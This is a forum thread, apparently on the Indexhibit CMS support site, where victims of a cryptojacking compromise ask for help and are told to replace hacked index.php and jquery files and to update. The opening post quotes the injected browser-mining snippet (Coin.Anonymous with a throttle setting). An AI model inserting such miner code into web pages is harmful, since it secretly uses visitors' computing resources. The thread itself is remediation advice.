Somebody managed to install a crypto-currency-mining-script on my site
window.miner = new Coin.Anonymous('61fy', {
throttle: 0.4
});
window.miner.start();
And I'm unable to find it.
Please help
Somebody managed to install a crypto-currency-mining-script on my site
window.miner = new Coin.Anonymous('61fy', {
throttle: 0.4
});
window.miner.start();
And I'm unable to find it.
Please help
Sorry about this. We're about to release a newsletter on the topic.
You should upgrade to the most recent version.
I believe the hack is in your root index.php file. If you look at that towards the bottom of the file you will see a bunch of random looking code. Simply replace that file with the root index.php file from the download and that will take care of things.
But, you must, update your site...and make a backup once you are done.
Edit: I see you are on the latest version. But you need to replace that index.php and also update the files in /ndxzsite/plugins/. If you have made edits to those be sure you place them back...
Thanks a lot.
I believe that did the trick.
I anybody is nerdy enough and want to have a peek at the mining script let me know.
I had the same issue a couple months ago, my hosting provider has "disabled jquery.js" for me (not exactly sure what this means), which solved the issue but left my site (saabv4.com) with menus that no longer collapse. Any idea how I can fix this? Many thanks!
Yes, replace your jquery file one that isn't hacked. Also, update to the most recent version.
Great, thanks. Assuming the most recent version download includes a fresh jquery file, that sounds like a simple enough fix.
Upgrade to v2.1.5 and replacing jquery solved the issue, thanks for the feedback!
Just for my understanding: is there anything I can do to avoid this type of hack in the future? Not sure how someone/ something managed to alter the code?
Keep your site backed up and updated and keep an eye on things.
I saw an article just yesterday about how bad the problem is right now - even UK and US gov websites have been hacked.
My website is also infected with jsminer, tried all the suggestions above but it didnt work.
What would a jsmine code look like, then I might find it by using the finding tool.
@wernerkonings it's here:
Post Nav and scroll to the bottom - is there bad code there? Take it out and all the white space.
Hi there. Not quite sure if I'm in the right thread. But on my site (zoltanadorjani.com) is something put already for a about a year.
Now, I got the time to solve it: I installed PHP 7.2, I upgraded to the latest Indexhibit and I exchanged index.php.
Still, nothing happened. If you use safari you see what is going on: there appears a button to mintme, and safari says this site is extremely energy consuming.
If somebody knows what to do I'D be rather happy.
And Vaska: very good job this development. I like it a lot. Thank you for bringing Indexhibit in the world.
I found out that "The_Sa" has actually the same problem as I have.
I really don't know where to look for. I tried to find that image "7nXZ6xdwe.png" that appears, but I couldn't find.
What does the code look like about. Does anybody know?
My host suggest to build the site again from the scratch. Is that the solution?
This thread has been closed, thank you.